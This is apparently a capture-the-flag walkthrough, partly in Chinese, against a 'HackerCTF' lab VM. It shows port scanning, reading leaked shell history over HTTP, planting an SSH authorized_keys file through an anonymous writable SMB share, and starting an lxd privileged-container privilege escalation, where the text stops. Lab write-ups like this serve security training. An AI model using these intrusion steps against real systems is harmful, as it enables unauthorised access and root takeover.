❯ ip=192.168.19.128 ❯ rustscan -a $ip -- -A -sV|tee scan.txt .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- I scanned ports so fast, even my computer was surprised. [~] The config file is expected to be at "/home/ctf/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 192.168.19.128:22 Open 192.168.19.128:80 Open 192.168.19.128:139 Open 192.168.19.128:445 Open 192.168.19.128:10123 [~] Starting Script(s) Scanned at 2024-12-11 19:51:07 CST for 91s PORT STATE SERVICE REASON VERSION 22/tcp open tcpwrapped syn-ack ttl 63 | ssh-hostkey: | 3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDKpxr6WQ9iNWlOTavpHHODTgb+G7eWY6SGUNHXdCf0c5/UfA/Bri6aLUEuy4sv6d2g/1SuBerpF82MGuyw7GH5Euh9u7QkFESTmEW75SwqiP7XeRSw1uxu3Mjg7467qeoLS5j/cIJdOGJR7OyZpQZKmN7j8bbyFw/ZgwEsr5dZzxBL6jonGY9Ms6uNDlCv0TE0N0wC/VKpzz5VfYB/88Cs7CKlEsOTdWarKD70S49xLXUVKJmoWUoxMNM8iXdN+uwSrTOBeLiKc7/LU2yhDS/+c/+8r3b7ss2VgTj3zvoXLVAJSBEUnX6fP/0zDxKILttj+rZhVrKdxewjiFU1JndjY2f4P5J+ugypQDWRTiiU0RIFez+4hNex8h7SvRV1iKqND2qBk1HMZNU0mqIjIfJ3QxFLGFOW6Po/0uXzEYbrkCv4ENrCUm5kwN8+/u/1wH2RAKTGCzjcHS60oSdpps/uv/ugsP5tMCxgfnyvHzgg1ie4uV+elG/Fp6PqR03YmM8= | 256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGxxEWdO4HTDIvYJI6pxeLoTxqG4E5E12Skl+WGpQTkd 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.46 ((Ubuntu)) |_http-title: HackerCTF |_http-server-header: Apache/2.4.46 (Ubuntu) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-favicon: Unknown favicon MD5: B214420B4A40927A3E19330A43080E56 139/tcp open netbios-ssn? syn-ack ttl 63 445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.6.2 10123/tcp open tcpwrapped syn-ack ttl 63 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Linux 2.6.18 (92%), Cisco Unified Communications Manager VoIP adapter (92%), Linux 2.6.26 (PCLinuxOS) (92%), Linux 2.6.30 (92%), Dish Network Hopper media device (91%), Linux 2.6.32 (91%), Linux 3.2.0 (91%), Linux 3.7 (91%), MikroTik RouterOS 6.15 (Linux 3.3.5) (91%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%) No exact OS matches for host (test conditions non-ideal).
❯ curl $ip:10123/.bash_history sudo su - ifconfig ls cd upload/ ls ls -l cd .. ls -l chmod 755 jarves/ ❯ curl $ip:10123/.mysql_history _HiStOrY_V2_ exit ❯ curl $ip:10123/something I wanted to make it my home directory. But idea must be changed.
Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers welcome Disk Welcome to Hackerctf LAB IPC$ IPC IPC Service (hackerctflab server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing. smbXcli_negprot_smb1_done: No compatible protocol selected by server. Protocol negotiation to server 192.168.19.128 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE Unable to connect with SMB1 -- no workgroup available ❯ smbclient -N \\\\$ip\\welcome Try "help" to get a list of possible commands. smb: \> dir . D 0 Sat May 8 15:42:49 2021 .. D 0 Sat May 8 02:38:58 2021 .mysql_history H 18 Sat May 8 15:05:03 2021 .profile H 807 Sat Mar 20 00:02:58 2021 upload D 0 Sun May 9 19:19:02 2021 .sudo_as_admin_successful H 0 Sat May 8 13:34:48 2021 .bash_logout H 220 Sat Mar 20 00:02:58 2021 .cache DH 0 Sat May 8 02:39:15 2021 something N 82 Sat May 8 00:18:09 2021 secrets N 0 Sat May 8 00:15:17 2021 .bash_history H 72 Sun May 9 19:23:26 2021 .bashrc H 3771 Sat Mar 20 00:02:58 2021
19475088 blocks of size 1024. 9687800 blocks available smb: \>
smb: \> mkdir .ssh smb: \> cd .ssh smb: \.ssh\> put authorized_keys putting file authorized_keys as \.ssh\authorized_keys (359.8 kb/s) (average 359.9 kb/s) ❯ ssh jarves@$ip -i id_rsa The authenticity of host '192.168.19.128 (192.168.19.128)' can't be established. ED25519 key fingerprint is SHA256:nB+xRANNsBufP64KnDjxamkvfGVw1eJUiz/kCMnJ9wU. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.19.128' (ED25519) to the list of known hosts. Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed Dec 11 01:07:47 PM UTC 2024 System load: 0.0 Memory usage: 25% Processes: 238 Usage of /: 45.1% of 18.57GB Swap usage: 0% Users logged in: 0 => There were exceptions while processing one or more plugins. See /var/log/landscape/sysinfo.log for more information. * Pure upstream Kubernetes 1.21, smallest, simplest cluster ops! https://microk8s.io/ 9 updates can be installed immediately. 0 of these updates are security updates. To see these additional updates run: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Sun May 9 11:14:10 2021 jarves@hackerctflab:~$
Root提权
看到本地有个mysql尝试之前获取的密码
1 2 3 4 5 6 7 8
jarves@hackerctflab:/var/www$ ss -luntp Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process -----------------省略------------------------- tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:* [::]:* jarves@hackerctflab:/var/www$ mysql -u root -p Enter password: ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
登不上😅,看了下sudo权限也没有,发现jarves用户隶属于lxd这个用户组
1 2
jarves@hackerctflab:/var/www$ id uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
jarves@hackerctflab:~/tmep$ lxd init Would you like to use LXD clustering? (yes/no) [default=no]: Do you want to configure a new storage pool? (yes/no) [default=yes]: Name of the new storage pool [default=default]: Name of the storage backend to use (btrfs, ceph, dir, lvm, powerflex) [default=btrfs]: Create a new BTRFS pool? (yes/no) [default=yes]: Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: Size in GiB of the new loop device (1GiB minimum) [default=5GiB]: Would you like to connect to a MAAS server? (yes/no) [default=no]: Would you like to create a new local network bridge? (yes/no) [default=yes]: What should the new bridge be called? [default=lxdbr0]: What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: Would you like the LXD server to be available over the network? (yes/no) [default=no]: Would you like stale cached images to be updated automatically? (yes/no) [default=yes]: Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: jarves@hackerctflab:~/tmep$ lxc init alpine privesc -c security.privileged=true Creating privesc jarves@hackerctflab:~/tmep$ lxc list +---------+---------+----------------------+-----------------------------------------------+-----------+-----------+ | NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS | +---------+---------+----------------------+-----------------------------------------------+-----------+-----------+ | privesc | RUNNING | 10.192.193.77 (eth0) | fd42:f30f:4652:7bee:216:3eff:fe5d:9508 (eth0) | CONTAINER | 0 | +---------+---------+----------------------+-----------------------------------------------+-----------+-----------+
